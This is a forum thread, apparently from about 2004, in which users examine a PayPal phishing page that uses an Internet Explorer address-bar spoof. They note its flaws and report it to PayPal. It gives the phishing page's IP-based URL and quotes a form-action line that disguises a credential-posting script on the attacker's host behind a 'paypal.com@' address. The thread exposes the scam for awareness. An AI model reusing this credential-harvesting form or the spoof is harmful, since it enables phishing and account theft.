 n2jtx
join:2001-01-13
Glen Head, NY
 ·Optimum Online
| An example of an address spoof There is a Paypal Phishing page at http://195.46.147.7/~bozkurts/header/index.htm that implements the newly discovered address bar spoof. I got a SPAM message the other day that had a link pointing to this page. It was rather impressive to see how it covered the address bar. Only problem is when you minimize IE, the address line is still visible! |
|
 BIGMIKEPremium
join:2002-06-07
Westminster, CA | said by n2jtx:
There is a Paypal Phishing page at http://195.46.147.7/~bozkurts/header/index.htm that implements the newly discovered address bar spoof. I got a SPAM message the other day that had a link pointing to this page. It was rather impressive to see how it covered the address bar. Only problem is when you minimize IE, the address line is still visible!
An example of an address spoof AND NOT A GOOD ONE, TRACE |
|
|
|
swbrains
join:2004-04-14
Wesley Chapel, FL | reply to n2jtx
It also doesn't seem smart enough to figure out where the existing address field is. On my browser, I have a Links bar below the address bar and it put the "spoofed" address bar over top of my Links bar. Made it very obvious it was doing something funky. |
|
 trparkyApple... YUMPremium,MVM
join:2000-05-24
Cleveland, OH
kudos:1 | reply to BIGMIKE
Reported to PayPal!
--
WedgeAntilles250 |
|
| reply to n2jtx
In Mozilla 1.6, I get a little Javascript box that says "demonstration requires IE5.5+/Win" |
|
 LloydrSeawolf
join:2001-11-27
Milton, FL
1 edit | said by ElJay:
In Mozilla 1.6, I get a little Javascript box that says "demonstration requires IE5.5+/Win"
same here, but i'm running neither ie nor windoze 
also funny how the "reported address bar spoof" supposedly effecting mozilla doesn't happen to my mozilla 1.6 on slackware linux and i've tried every link around that suppose to effect mozilla....guess it's mozilla on windoze eh |
|
| reply to BIGMIKE
How did you do the trace?
Pretty neat! |
|
bmn? ? ?Premium,ExMod 2003-06
join:2001-03-15
hiatus
1 edit | reply to trparky
If you read the pop-up Window when the page loads (in a non-IE browser), its says the page is a demostration... |
|
BIGMIKEPremium
join:2002-06-07
Westminster, CA
1 edit | reply to whoamIoramI
said by whoamIoramI:
How did you do the trace?
Pretty neat!
search google for "Visual Trace"
McAfee Visual Trace -- the incredible detective utility based on technology used by the FBI to track down malicious hackers, identify serial spammers, and thwart online fraud.
»www.mcafeestore.com/dr/v2/ec_MAI···D=143986
»www.visualware.com/personal/prod···dex.html
»www.hlembke.de/prod/3dtraceroute/
»www.softwareriver.com/ |
|
1 edit | reply to n2jtx
oops  |
|
| reply to BIGMIKE
Good to know someone knows about this already |
|
| said by X_Zeratul_X:
Good to know someone knows about this already
I was about to say the same thing  Way to go McAfee! |
|
BIGMIKEPremium
join:2002-06-07
Westminster, CA | ction="***://www.paypal.com****************************************************************************** ******************************************************************************************** ***************@195.46.147.7/~bozkurts/header/log.php" method=post name="login_form"> |
|
| reply to Lloydr
Hi,
No, never had any addressbar spoofs work in Moz - either mozilla itself nor FireFox. . .
|
|
Reviews:
·Choice Cable TV
 ·Coqui/PRTC
| reply to n2jtx
If your address bar is in an odd place the screen will show two addreses like this. Kind of hard to spot due t the colors but there it is. |
|
